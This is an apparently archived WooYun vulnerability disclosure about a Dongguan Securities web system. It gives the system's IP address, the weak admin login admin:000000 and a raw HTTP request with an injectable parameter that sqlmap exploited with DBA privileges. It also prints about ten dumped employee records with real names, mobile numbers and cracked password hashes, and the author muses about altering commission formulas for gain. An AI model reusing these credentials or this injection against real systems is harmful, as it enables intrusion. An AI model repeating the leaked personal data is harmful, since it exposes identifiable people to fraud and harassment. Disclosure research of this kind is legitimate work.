当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0163274

漏洞标题:东莞证券某站弱口令到SQL注入导致用户(姓名\电话\邮箱等)信息泄露

相关厂商:东莞证券股份有限公司

漏洞作者: 路人甲

提交时间:2015-12-21 21:58

修复时间:2015-12-26 22:00

公开时间:2015-12-26 22:00

漏洞类型:应用配置错误

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-21: 细节已通知厂商并且等待厂商处理中
2015-12-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

http://113.78.134.110:81/login.do 弱口令admin:000000

11.png

发现了一些有意思的功能,比如可以控制提成

11.png

若是我直接修改了提成的公式,然后勾搭一两个人那啥(好暴利)。

漏洞证明:

POST /plug-in/FormulaEdit/xcfa/XCFA_operater.jsp?MODE=getRYJB HTTP/1.1
Host: 113.78.134.110:81
Content-Length: 7
Accept: */*
Origin: http://113.78.134.110:81
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://113.78.134.110:81/plug-in/common/transfer.jsp?ObjName=JspXCFA_ALL&Title=%E8%96%AA%E9%85%AC%E6%96%B9%E6%A1%88%E6%9F%A5%E7%9C%8B&Target=%2FUIProcessor%3FTable%3DJspXCFA_ALL%26ObjDescribe%3DekQgsYuZOYlCJlO7vghYvv41*q*BGee3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,es;q=0.6,fr;q=0.4,vi;q=0.2
Cookie: JSESSIONID=CD1D8642528FC7F86453EDE89D86BA6D.server1; UserID=admin; PortalToken=CD1D8642528FC7F86453EDE89D86BA6D.server1; ys-TreeState_5c1e7d68efba511c6e0ea9b8cafa4fb3.gt=o%3ARoot%3Ds%253AE%5EType.0%3Ds%253AE%5EType.1%3Ds%253AE; ys-TreeState_93782624d81163345d84577e158e26bd.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_799cde630a734708b3880f841ffa3f7d=o%3A1%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_e0b9adc1f800d29087017abd5def90cb.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_ed9b71d747488ab403c5cbf458822293.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_190cd205bb5a88c520b1fb91a3415f3a.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_7ef60d9127bb21b3203ca468ff919460.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_aa1c2e4bf18892844e938f68b2de3da1.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_293313064b95482991c003a03ac389b8.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE
RYFL=24

直接丢sqlmap里面,发现还是DBA权限

11.png

查看到用户量不大,才1W多些

11.png


但是涉及到用户的姓名,电话,邮箱等基本信息,提取了最近的部分

787134,6014436,\\u8881\\u52b2\\u94ba,xtheme-blue,5463610,1,[email protected],13672920390,main|document_manage|remoteAccount,\\u8425\\u9500\\u4eba\\u5458\\u6570\\u636e\\u7edf\\u8ba1,5078,96e79218965eb72c92a549dd5a330112 (111111),5078101,0,2015-06-05 17:15:00,2014-12-16 16:28:31,6,5078101,2014-12-16 16:28:31
83462,6014452,\\u5218\\u4e9a\\u521a,xtheme-blue,NULL,1,NULL,15231525063,main|document_manage|remoteAccount,\\u8425\\u9500\\u4eba\\u5458\\u6570\\u636e\\u7edf\\u8ba1,5013,96e79218965eb72c92a549dd5a330112 (111111),5013101,0,NULL,2014-12-17 14:07:04,0,5013101,2014-12-17 14:07:04
19561,6014456,\\u8bb8\\u7ef4\\u5178,xtheme-blue,85822938,0,[email protected],18688061642,main|document_manage|remoteAccount,\\u8425\\u9500\\u4eba\\u5458\\u6570\\u636e\\u7edf\\u8ba1,5049,96e79218965eb72c92a549dd5a330112 (111111),5049101,0,NULL,2014-12-17 15:33:44,0,5049101,2014-12-17 15:33:44
82842,6014529,\\u738b\\u4e3d\\u8273,xtheme-blue,NULL,1,NULL,NULL,main|document_manage|remoteAccount,\\u8425\\u9500\\u4eba\\u5458\\u6570\\u636e\\u7edf\\u8ba1,5011,96e79218965eb72c92a549dd5a330112 (111111),5011101,0,2015-01-15 13:37:38,2014-12-24 10:25:45,1,5011101,2014-12-24 10:25:45
qijm,6014597,\\u7941\\u5609\\u654f,xtheme-blue,NULL,0,NULL,NULL,finance|remoteAccount,\\u8d22\\u52a1\\u7ba1\\u7406,10007,96e79218965eb72c92a549dd5a330112 (111111),admin,0,2015-03-05 09:07:49,2014-12-31 15:56:36,38,admin,2014-12-31 15:56:36
71666,6014794,\\u6768\\u7389\\u9752,xtheme-blue,NULL,1,NULL,13591173727,main|document_manage,\\u8425\\u9500\\u4eba\\u5458\\u6570\\u636e\\u7edf\\u8ba1,5071,96e79218965eb72c92a549dd5a330112 (111111),5071101,0,NULL,2015-01-26 10:45:15,0,5071101,2015-01-26 10:45:15
71621,6014795,\\u90ed\\u715c,xtheme-blue,NULL,1,NULL,15904269933,main|document_manage,\\u8425\\u9500\\u4eba\\u5458\\u6570\\u636e\\u7edf\\u8ba1,5071,96e79218965eb72c92a549dd5a330112 (111111),5071101,0,NULL,2015-01-26 10:47:15,0,5071101,2015-01-26 10:47:15
69794,6014869,\\u8d75\\u7fe0\\u83b9,xtheme-blue,NULL,1,NULL,13790491703,main|document_manage,\\u8425\\u9500\\u4eba\\u5458\\u6570\\u636e\\u7edf\\u8ba1,5069,96e79218965eb72c92a549dd5a330112 (111111),5069101,0,2015-03-19 14:56:36,2015-02-09 15:02:45,3,5069101,2015-02-09 15:02:45
18406,6014874,\\u949f\\u94ed\\u7235,xtheme-blue,85186861,1,NULL,18825520374,main|document_manage,\\u8425\\u9500\\u4eba\\u5458\\u6570\\u636e\\u7edf\\u8ba1,5048,21218cca77804d2ba1922c33e0151105 (888888),5048101,0,2015-07-06 16:33:04,2015-02-10 10:16:15,23,5048101,2015-02-10 10:16:15
817275,6014904,\\u9ec4\\u4fca\\u6807,xtheme-blue,07566290229,1,[email protected],13660799890,main|document_manage,\\u8425\\u9500\\u4eba\\u5458\\u6570\\u636e\\u7edf\\u8ba1,5010,b82ef710e72ee35fc33bd9a454668b01,5010101,0,2015-06-05 16:44:12,2015-02-26 15:18:29,8,5010101,2015-02-26 15:18:29

居然发现了大量的弱口令...

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-26 22:00

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无